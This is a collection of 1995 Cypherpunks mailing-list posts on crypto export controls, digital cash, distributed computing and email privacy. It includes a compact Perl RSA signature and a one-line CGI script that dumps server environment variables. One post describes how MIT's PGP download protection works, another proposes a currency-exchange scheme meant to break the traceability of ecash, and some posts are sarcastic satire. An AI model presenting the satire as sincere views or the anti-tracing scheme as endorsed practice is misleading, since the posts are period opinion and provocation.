Message-ID: <Pine.SV4.3.91.951026234915.15329H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> How about INS coming into the equation?  Do they have additional powers which
> let them put your butt in a bad imitation of a farday cage?

   It is well-settled, that the area around the borders is "special" with 
respect to immigration-related enforcement.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Fri, 27 Oct 1995 14:18:53 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: idle CPU markets
Message-ID: <v01520c05acb625608f09@[199.227.2.161]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 PM 10/26/95, you wrote:

>What other problems would benefit from easy access to lots of distributed
>CPU cycles?

3D Rendering and Physics simulations come immediately to mind.

signoff
2048bit-Fingerprint: 74 64 C7 6F 51 72 36 3D 87 75 F9 F5 2A F6 8F 74
------------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Fri, 27 Oct 1995 15:13:30 +0800
To: Steven Levy <steven@echonyc.com>
Subject: Re: newsweek oct 30 Levy digital cash article
Message-ID: <v02130500acb6343348e6@[204.221.10.130]>
MIME-Version: 1.0
Content-Type: text/plain


>>also, my question about whether one loses the downloaded Chaumian bucks
>if one's hard drive crashes was answered in the affirmative by Levy.
>
>But as I said, if the drive is backed up you don't lose it. It's my 
>understanding this is the case with the current Digicash/Twain bucks.  
>But not necessarily with all implementations.
>
>This "lose your money" with digital cash really does seem to get to 
>people. I always point out that when you take $ out of an ATM machine, 
>you don't expect to get it back if you lose it.  For those forms of 
>e-money that are irretrevable when lost users are warned not to download 
>huge amounts. 
>
>Question: will people's worries about losing their e-money lead them to 
>accept a higher degree of tracibility as a tradeoff?  

I have a question about Digicash that I haven't seen addressed. I've participated in the beta test but have to admit I didn't use it with great frequency. I only downloaded $10 at a time. What surprised me was that one time I was informed that the money I had downloaded had expired. I was able to go back and pick up more but am perplexed with what happenned in that case. Does digicash actually age and disappear if not used soon enough?


-Steve Bryan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Fri, 27 Oct 1995 12:30:13 +0800
To: hallam@w3.org
Subject: Re: MD4-derived hash functions
In-Reply-To: <9510261603.AA26221@zorch.w3.org>
Message-ID: <199510270413.VAA29718@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Oct 1995 12:03:57 -0400, you wrote:

> 3DES with only two independent keys is only slightly more secure than
> DES, consider a variant of the meet in the middle attack exploiting 
> the fact that the constraint network is reductible to two equations
> in one unknown.

I believe you meant 2DES?  I've not heard of a meet in the middle
attack on 2-key 3DES better than brute force of a 112-bit key.

Even for 2DES, or for 3-key 3DES, doesn't a meet in the middle attack
require on the order of 2^56 words of memory?  This, as a practical
matter, makes a brute-force attack much more difficult than it would
appear at first glance.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 27 Oct 1995 21:18:56 +0800
To: cypherpunks@toad.com
Subject: Re: idle CPU markets
Message-ID: <199510271321.GAA21142@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>1.  Many such applications want their computation to be highly 
>responsive--  the long turn-around involved in farming your task 
>over a WAN is often prohibitive.  (E.g. real-time graphics.)

Use the right tool for the right job. Cycle sales are useless for most
applications, and forcing a square peg into a round peg will only result in
frustration. There are a gazillion useful outlets for this technology,
though - more pop up all the time. The latest I heard today was OCR .tiff ->
.txt conversion, where the payee can afford (cpu-wise) to toggle all the
settings to the highest (slowest) quality.

>2.  Also many applications that need this kind of power are highly 
>sensitive to inaccuracy or fraud.  A scientific modelling experiment 
>which uses zillions of cycles can be rendered completely worthless 
>if a tiny calculation that had been farmed to Joe Blow is done wrong 
>or is lied about by Joe.

Voting - send the same data to 3+ unrelated machines (if you can afford
redundancy) and accept the 'majority opinion'.

Sanity checking - depends on the algorithms in question; may require human
intervention in many cases, where errors (accidental or not) may not be
easily machine-recognizable.

... just to name a couple of the top of my head.

>3.  Similarly, many such applications are highly confidential.

This is the easy one :) That is to say, solutions to this problem are
already being implemented for other applications.
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 27 Oct 1995 21:23:12 +0800
To: cypherpunks@toad.com
Subject: Re: idle CPU markets
Message-ID: <199510271325.GAA21232@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>>What other problems would benefit from easy access to lots of distributed
>>CPU cycles?
>
>3D Rendering and Physics simulations come immediately to mind.

A graphic-arts chum of mine is really hyper about cycle sales - it will
allow him to produce broadcast-quality commercials on a project-by-project
basis without a huge initial hardware upgrade investment. Is anyone working
on a Java libarary/demo/whatnot that allows plug-in algorithms, work
completion 'fetch next batch' code, and some rudimentary authentication
scheme? If not, I may tinker with this - if so, I'd like to chat :)
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 28 Oct 1995 01:27:54 +0800
To: cypherpunks@toad.com
Subject: Re: e-mail, business and privicy
Message-ID: <acb653d50f021004a987@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:15 PM 10/27/95, WOOD@VAX2.ROCKHURST.EDU wrote:
>An old subject, but could someone please give me a pointer
>to the legalities of reading other peoples mail in the working
>environment.
>
>Many thanks,

I doubt many others will offer answers to this one, so I will.

The usual way to get authorization to read the mail of other people is to
be officially deputized as a member of the Citizen's Morality Watch. Your
local law enforcement office, or the FBI, can help you fill out the
paperwork and get you the badge and ID card. (I signed up early, and have
one of the ID cards signed by William Webster.)

Once deputized, you are authorized to read whatever mail you may think a
threat to the public consciousness.

And when GAK arrives, you'll be duly authorized to gain access to escrowed
keys. And to escrowed house keys, escrowed car keys, and escrowed diaries.

This will finally give us the same measure of security that the Soviets had
when babushkas and KGB men read one's mail, and that the Iranians now have
with the Islamic Purity Patrols on the streets of Teheran.


--Klaus! von Future Prime, avatar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 27 Oct 1995 22:38:28 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: CJR returned to sender
In-Reply-To: <m0t8aTG-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951027100225.10892F-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


And yet people like MIT get approval for the release of PGP this way.

It is clear that 
1) the government will (verbally?) clear the "PGP procedure" when pushed.
2) they need to be pushed.

If anyone from MIT is reading this, it would be a real public service to 
put on a web site (a) what the system used for the release of PGP is 
exactly and (b) what assurances (oral, written, names & dates) was 
received from State/Commerce that this was legal.

Publicizing this information would lay the groundwork for APA (or, given
the way the ITAR is written, maybe no...) and 5th Amendment / due process
challenges by other parties unable to get the straight answers they
deserve. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Sat, 28 Oct 1995 01:13:44 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: CJR returned to sender
In-Reply-To: <acb5766d09021004a512@[205.199.118.202]>
Message-ID: <KAA03062.199510271410@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <acb5766d09021004a512@[205.199.118.202]>, Timothy C. May writes:
[...ITAR preventing Netscap from distributing the non-40bit Netscape
effectavally...]
>And I agree that this is a much more important issue than whether a t-shirt
>can get an OK for export or not.

I doubt anyone would disagree.

>If the CJR for the t-shirt is ultimately granted, what useful information
>will be derived,

The fuzzy line dividing exportable goods from non-exportable goods
will have gotten slightly clearer.  I admit it isn't all that novel
or intresting, or even in this case _useful_ result.  Esp since
the PGP book appears to be exportable.

However I think it is a good idea to slowly approch the dividing
line between exportable and non-exportable.  Wouldn't it be nice
to be able to hold up the shirt and say "this is exportable", and
then scan it & save it onto a floppy and then say "this is not"
(assuming that a floppy of the shirt is denyed CJ) when arguing
with someone about how arbatary the export laws are?

(Also we may find a better quality shirt printer and actually be
able to print readably not only CODE128 barcodes, but some of the
more advanced encoding methods that store as much as 40K a page...
how big is the PGP source?)

>                  or what implications for Netscape's question will be
>discovered?

Not much.

>If the CJR for the t-shirt is ultimately denied, ditto?

That would be much better.  More free publicity.  An example of how
impossabble it is to enforce the ITAR that anyone should be able to
understand.


Of corse in either case having the CJR steps posted *is* actually
valuable to anyone who hopes to take a shareware (or comercial, or
totally free) product through the same process (as opposed to 
anonumously posting it & not getting payed).


>Distribution over networks--which is happening every day, and which is
>happening every time the Cypherpunks list contains code fragments and other
>useful comments on crypto tools--is a much more serious issue.

Yes if distribution over the networks were allowed nobody would care
about the shirt.  Of corse.

>The t-shirt joke is unlikely to help. (For all those who commented that
>wearing the munitions shirt is rilly, rilly kool, I say "Great!" Wear it in
>the mosh pits, just lie to people about how the t-shirt "has been
>classified as a munition." It hasn't been as of this writing.)

I susspect the help the shirts will provide will be minimial.  They
may help cypherpunks & cyphergroupies spot each other on the street,
but that is of limited value.  They may help spread the word about
how foolish the ITAR is, and that is their only real value (well
aside from entertainment).

(and yeah it is a shame the shirt actually says "has been classified",
I had thought I said "qualifyes as a" which would have been correct -
but that may just be my revisionest memory kicking in)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WOOD@VAX2.ROCKHURST.EDU
Date: Sat, 28 Oct 1995 00:44:55 +0800
To: cypherpunks@toad.com
Subject: e-mail, business and privicy
Message-ID: <01HWXJ7WNGYA000F24@VAX2.ROCKHURST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


An old subject, but could someone please give me a pointer 
to the legalities of reading other peoples mail in the working 
environment.

Many thanks,	

-------------------------------------------
 |   "Computers are boring and slow."    |                     
 |                                       |
 | 	David Wood                       |
 |      Information Systems Specialist?  |
 |  	wood@vax2.rockhurst.edu          |
-------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 27 Oct 1995 22:39:12 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Mondex keeps records
In-Reply-To: <199510261340.AA15989@ideath.goldenbear.com>
Message-ID: <Pine.SUN.3.91.951027101018.10892J-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


The snippet from network week (that hit my box via this list with no
subject line, not even a "blank", how do they do that?) suggests Mondex is
keeping transaction records.  When I put this exact question to the head
of Mondex last week, he said that the cards were capable of this, but that
they had not decided whether to do it or not.  The clear impression,
although in retrospect perhaps not the clear statement, was that they were
not doing it at the present time. 

Interesting.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Fri, 27 Oct 1995 18:39:17 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <8436.9510271027@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



On the T-shirt which some poeple are starting to view as an overplayed
joke:

I'd agree that we on cypherpunks have probably heard enough on the
subject, to the extent that it was creating a lot of noise a while
back, but the idea I think is to create publicity wherein ITAR is
ridiculed by demonstrating that the State Departments ITAR related
decisions are inconsistent, and arbitrary.

This I think is a similar tactic to that used by Phil Karn, with the
Applied Crypto case, and by MIT with the MIT PGP source code book and
CJR on that.

Also the SSL 88+40 brute force was mostly a political demonstration,
most anyone could have predicted the approximate MIPs required, and
that it was ridiculously weak.  Yet much of the media attention widely
ignored the fact that it was a simple fact, 40 bits isn't enough, and
chose instead to play on wording such as "French Student Hacker breaks
Netscape", which of course is wildly inaccurate on numerous counts.

As to the accusation that a T-shirt is silly, sure, I absolutely
agree, but it's *supposed to be* silly, the point being to get a
decision from the state department, and say, look the decisions these
people are making with extreme weight of law ($1,000,000 fines &c) are
ridiculously inconsistent, and arbitrary, and cost the US software
industry 100s of millions of dollars each year in lost trade.  With a
silly example, I would have thought you would be more likely to get
positive editorials from the press.  I mean if you say PGP, some
people are sucked in by the crypto scare stories Freeh and co put out.
If it's a T-shirt you'd have a hard time saying it was a dangerous
item, or that the info was dangerous.

If unclear fabric printing is the issue, put it on a floppy disk
(would take less than one sector), print the program on the disk label
and try that too.  Also my uk printed shirts, and Don Henson's (other
US supplier) have a simply huge barcode (Joel's is around 1/2 the
size) the aim being to remove all doubt about readability.  See
pictures (mine (UK), and Don's (US) respectively):

	http://www.dcs.ex.ac.uk/~aba/uk-shirt.html
	http://www.colossus.net/wepinsto/wsft_f/wspp_f/tshirt1.html

You could probably transcribe that barcode by hand the stripes are
that fat.  The ITAR docs themselves don't seem to make the case that
machine readability is significant, that was to my understanding just
an arbitrary decision they displayed with Phil Karn's Applied Crypto
disk set.  No to the disks due to being more machine readable than the
book, or something.  The reason for the barcode was to try to
encourage banning of the T-shirt by pandering to thier apparent
prediliction to ban machine readable forms of things freely available
in print form.

On the "has been declared a munition by State Department", this is
clearly incorrect.  Don Henson used this in his earlier ads, and I
corrected him on this wording, and he now says something different.

The wording on the shirt (Joel Furr's shirt which is what Raph mailed
I understand) the caption is:

	"This shirt is a munition"

and you can see a picture of this shirt it, here:

	http://www.danger.com/ad-perl.html

I don't think saying this shirt is a munition is that misleading.  It
is arguable, and of course no decision has been obtained from the
State Department, but if anyone is so sure about it I'd invite them to
make a public demonstration of exporting it in any medium they fancy
(paper, disk, internet, T-shirt).  Another candidate: export snuffle
without asking permission.  I hear that it is only 10 lines of C code.

Adam
--
Munitions T-shirt home page: http://www.obscura.com/~shirt/

#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Fri, 27 Oct 1995 22:55:15 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Re: Linux security issues
Message-ID: <30911745@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



>Actually keeping the pass phrase out of swap space is fairly easy (although
>I havn't looked at the PGP code to see if it actually does this).
>...
>However, the pass phrase is not the only dangerous information.
>...
>N.B. This problem affects all virtual memory operation systems.

Not all of them.  In at least one (VMS) you can pin pages in physical 
memory,
i.e., prevent them from being written to disk.  Actually, any OS that does 
I/O
directly to user pages has that capability in the kernel; in the case of VMS
(and possibly others, I don't know) it also exists as a system service that
applications can invoke.

This solves the problem: you can pin a suitable number of pages, and put
your sensitive data buffers there.

     paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 27 Oct 1995 22:58:17 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: CJR returned to sender
In-Reply-To: <acb5766d09021004a512@[205.199.118.202]>
Message-ID: <199510271429.KAA13494@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> At 4:43 PM 10/26/95, Jeff Weinstein wrote:
> 
> If the CJR for the t-shirt is ultimately granted, what useful information
> will be derived,

Bar coded source code will be declared to be exportable under the
ITAR. This will be the first time machine readable crypto code is
declared exportable.

> If the CJR for the t-shirt is ultimately denied, ditto?

It will not only prove embarassing because the situation is so silly,
and produce vast amounts of added P.R., but may very well prove to be
an ideal test case -- the speech in question is so political, and the
demonstrable harm to the national security so non-existant, that the
court case would be of value.

Of course, Tim won't be seeing this posting (as he has declared me to
be on his kill list) so he'll keep claiming the exercise is useless,
but I think its extremely valuable. Go for it! Don't let the grumpy
folk tell you this is a "joke". Its no more funny than the entire
export control regime.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sat, 28 Oct 1995 01:18:33 +0800
To: Richard Johnson <Richard.Johnson@Colorado.EDU>
Subject: Re: HTTP Request-Header & Server Environment Echoes
In-Reply-To: <v02130500acb55ea73e82@[204.131.233.57]>
Message-ID: <Pine.SUN.3.90.951027102716.9465A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Actually this is to simple justput the fallowing in your cgi directory 
and make it executable:

#!/bin/sh

/bin/echo Content-type: text/plain
/bin/echo

set

Thats all you need.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Thu, 26 Oct 1995, Richard Johnson wrote:

> Subject: HTTP Request-Header & Server Environment Echoes
> 
> <HTML>
> <HEAD>
>     <TITLE>What Your Browser Says Behind Your Back</TITLE>
> </HEAD>
> <BODY>
> <PRE><TT>
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Sat, 28 Oct 1995 01:55:29 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Mark Twain Bank's DigiCash offer
Message-ID: <9510271546.AA00580@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>  As far as I can tell there is no charge for moving funds between
>  your ecash wallet and the "mint" at the bank.  The charges are for
>  moving between the "mint" and the world access account.  If you
>  had a shop which was able to pay much of its expenditures in ecash
>  it sounds like there would be no percentage fee to the bank.

The gotcha being that as long as your money is in the "mint" it is not under  
FDIC protection...  Just how safe your cash is when it is in the mint is  
entirely related to the security of Mark Twain's systems, which are  
high-profile machines that will surely be subjected to many cracking  
attempts.  Some may prefer to keep complete control over their cash and store  
all of it themselves.  Unlike physical cash, this stuff can be split up,  
encrypted, and stored in multiple places, possibly offering more security  
than the Mark Twain "mint."


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 27 Oct 1995 23:47:33 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: CJR returned to sender
In-Reply-To: <Pine.SUN.3.91.951027100225.10892F-100000@viper.law.miami.edu>
Message-ID: <199510271446.KAA13555@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Froomkin writes:
> And yet people like MIT get approval for the release of PGP this way.
[...]

> If anyone from MIT is reading this, it would be a real public service to 
> put on a web site (a) what the system used for the release of PGP is 
> exactly and (b) what assurances (oral, written, names & dates) was 
> received from State/Commerce that this was legal.

I don't think they got any sort of approval from State or Commerce --
I think they just discussed it with their own lawyers.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 28 Oct 1995 03:18:41 +0800
To: cypherpunks@toad.com
Subject: Children's Rooms at Libraries Need Regulation
Message-ID: <acb673171002100401b4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:18 PM 10/27/95, Jim Ray wrote:

>Humorous sidenote: PRZ said that the Exon <spit!> bill is the
>equivalent of turning the entire Internet into the children's room
>at the public library. I will be getting a videotape of the show in
>about 2 weeks, and if anyone wants me to make them a copy please
>e-mail me (privately!) and I will try to oblige.

Actually, the "children's rooms" at public libraries are next on the list
to be regulated. Many of the books our children are reading feature
_talking animals_ and other examples of animism and pagan beliefs. Some
even have witches and goblins. That our tax dollars are being used to fund
pagan and heathen views is cause for alarm.

Thankfully, out here in California we are shaking off our liberal, heathen,
godless Jew commie system. Los Altos, a prosperous community in Silicon
Valley, recently banned the mention of Halloween in its schools. No
costumes, no heathen imitations, and NO DEVIL WORSHIP!

Hallelujah!

"Freedom is not the freedom to have wrong beliefs."

--Klaus!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@TeleCheck.com>
Date: Sat, 28 Oct 1995 02:45:50 +0800
To: WOOD@VAX2.ROCKHURST.EDU
Subject: Re: e-mail, business and privicy
In-Reply-To: <01HWXJ7WNGYA000F24@VAX2.ROCKHURST.EDU>
Message-ID: <9510271741.AA04695@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text


> 
> An old subject, but could someone please give me a pointer 
> to the legalities of reading other peoples mail in the working 
> environment.
> 
> Many thanks,	
> 

Unless otherwise notified, I believe you have a right to 
privacy.  Some companies are up front and make you sign a
piece of paper to the effect that when your at work... 

Here at TeleCheck, we had to sign a piece of paper that promised
that we wouldn't read each *other's* mail, after a nasty incident
in which involved an employee and forged mail ardently confessing
is new found homosexuality (boy was be suprised...).  But that
was a long time ago, which predates the notices we had to sign.

The point was clear.  Don't read your supervisor's mail or you will be
terminated (as an employee was). 

-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
			(800) 888-4922  *   (713) 439-6597
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 28 Oct 1995 01:59:29 +0800
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
Message-ID: <199510271647.MAA07174@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510260424.OAA12383@sweeney.cs.monash.edu.au>,
jirib@sweeney.cs.monash.edu.au (Jiri Baum) wrote:


> What you'd really want is for Alice to pay for the new coins in ecash.

Right.

> I'm wondering whether a "coin-changer" would be easier or harder to
> set up than a "bank" (from regulatory point of view).

I don't think it would be any easier to set up. Harder perhaps, since its
sole purpose is money laundring. However, if there are several Ecash
currencies there is a legitimate need for Ecash currency arbitration. Who
is to stop the following protocol?

US Ecash -> Swedish Ecash
Swedish Ecash -> US Ecash

The resulting coins are no longer traceable unless the repayer cooperates.
The repayer (or in this case currency arbitrator) keeps of course a
percentage at each transaction. No different than a Casa de Cambio. It can
be set up anywhere and even be done anonymously. I am working on an
implementation.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMJENOCoZzwIn1bdtAQETtQGA1c2lAxu2HcrudvQ7OgIrJptiDBueqVM5
uYIuB4n0fNzv6kdh+LYqctKj2BzOlE22
=a7mC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 28 Oct 1995 04:56:47 +0800
To: cypherpunks@toad.com
Subject: Electric Communities (was: COS_sec)
Message-ID: <v02120d04acb6f56280f0@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



FWIW, this is the company I work for. Not a bad article; more
info is available at: http://www.communities.com/. Three of
the nine people who work here are long-time subscribers to this
list... I was recruited at a c'punks Bay Area meeting.

--doug "member of the cryptographic staff" barnes

>      Electric Communities began work began in 1993 on the
>      Cyberspace Operating System, or COS, designed to manage
>      the resources of shared computing -- like security and
>      bandwidth -- just as operating systems like the
>      Macintosh OS or Windows 95 manage resources inside a
>      desktop PC. The team is inventing some technology,
>      including a programming language (compatible with Sun
>      Microsystems' new Java language for Internet
>      applications) and a design concept for software building
>      blocks which it is in the process of patenting. In
>      addition, staff cryptographers are weaving encryption
>      throughout the system to make it absolutely secure and
>      private.
>
>
>   COS_sec  (6 kb)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sat, 28 Oct 1995 02:13:31 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Linux security issues
In-Reply-To: <199510270552.WAA17904@netcom7.netcom.com>
Message-ID: <199510271704.NAA07834@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Actually keeping the pass phrase out of swap space is fairly easy (although
> I havn't looked at the PGP code to see if it actually does this).  Read the
> pass phrase in raw mode, one character at a time and convert it one
> character at a time to the decryption key for the private RSA key.  Then
> the OS doesn't need to buffer the whole line, either in kernel space or in
> user space.

This isn't as easy as you think, and it completely breaks many
abstractions to do this!  PGP does some of this, but not all of it.
It does get the pasphrase one character at a time, however it does
buffer it all before hashing it to a key.  One reason is that you do
not necessarily know how big a session key you need, so you may need
to use different hashing techniques to get different sized keys.

It would be nice if PGP tried to lock its memory pages on OS's that
support page locking, so that some pages dont get swapped out.  But
that isn't a very general solution, since not all OS variants provide
such a mechanism.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sat, 28 Oct 1995 02:19:53 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: CJR returned to sender
In-Reply-To: <Pine.SUN.3.91.951027100225.10892F-100000@viper.law.miami.edu>
Message-ID: <199510271718.NAA07989@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> If anyone from MIT is reading this, it would be a real public service to 
> put on a web site (a) what the system used for the release of PGP is 
> exactly and (b) what assurances (oral, written, names & dates) was 
> received from State/Commerce that this was legal.

I can explain (and have explained in this forum) the technical aspect
of how the MIT PGP site works.  I was not involved in the law aspect
of the debate, so I cannot answer legal questions.

There is a two-tiered protection scheme.  The first scheme is that you
need to know the secret directory where PGP resides.  This directory
changes location every 30 minutes, so any attacker has a 30 minute
window in which a name will be valid.  Not 30 minutes from the time
they receive it, 30 minutes from the time the directory last changed
names.

The second scheme involves using reverse DNS lookups and comparing the
DNS hostname to a list of know US-valid hostnames/domains.

An attacker needs to be able to circumvent both schemes at once in
order to get to PGP.

I can go into more detail if people want, or I can take this offline
if people prefer.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 28 Oct 1995 02:19:05 +0800
To: cypherpunks@toad.com
Subject: PRZ On Mitchells
Message-ID: <199510271718.NAA56324@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello again cypherpunks:

[I hope this info. isn't already posted, my sincere apologies if it
has. I get the "digest" version of the firehose these days, and
there's a slight delay on my end.] Anyway, 

I'm informed by my brother in Punta Gorda, FL that "Mitchells in the
Morning" -- a conservative/libertarian husband & wife talkshow on
"National Empowerment Television," featured Phil Zimmermann and
Robert Holliman(sp?) President of the "Business Software Alliance"
this morning. Talk was mostly about how stupid software export
controls are, as PRZ was understandably reluctant to discuss details
of the grand jury investigation.

Humorous sidenote: PRZ said that the Exon <spit!> bill is the
equivalent of turning the entire Internet into the children's room
at the public library. I will be getting a videotape of the show in
about 2 weeks, and if anyone wants me to make them a copy please
e-mail me (privately!) and I will try to oblige.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMJET0W1lp8bpvW01AQGKIwP+L4zvjUp6NewdpJYUL5yHH8g7NZjm2DCN
GyOA4RvzTTFt9c1xZzTPZ4cpxky5+6JrBYClAg0UiyqXBkRf55JDVONrf7NpSUT0
9cLPDzRVxs4Tns+hjVU0G/O29hfQJ6TbxEtqIRmg+GElar4tbC3cYILbc1gnrxOh
FeQ+ltB63oc=
=9umd
-----END PGP SIGNATURE-----
Regards, Jim Ray

Disemboondogglin' -- Reducing the rate of increase in a government
program when adjusted for inflation (as opposed to a "cut"). --
Tom Ray, my brother.

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
Featuring cypherpunk stuff and some babypictures!
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 28 Oct 1995 06:02:35 +0800
To: Steven Levy <steven@echonyc.com>
Subject: Re: newsweek oct 30 Levy digital cash article
In-Reply-To: <Pine.SOL.3.91.951026180246.16411E-100000@echonyc>
Message-ID: <199510272049.NAA29753@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



S.L.:
>>also, my question about whether one loses the downloaded Chaumian bucks
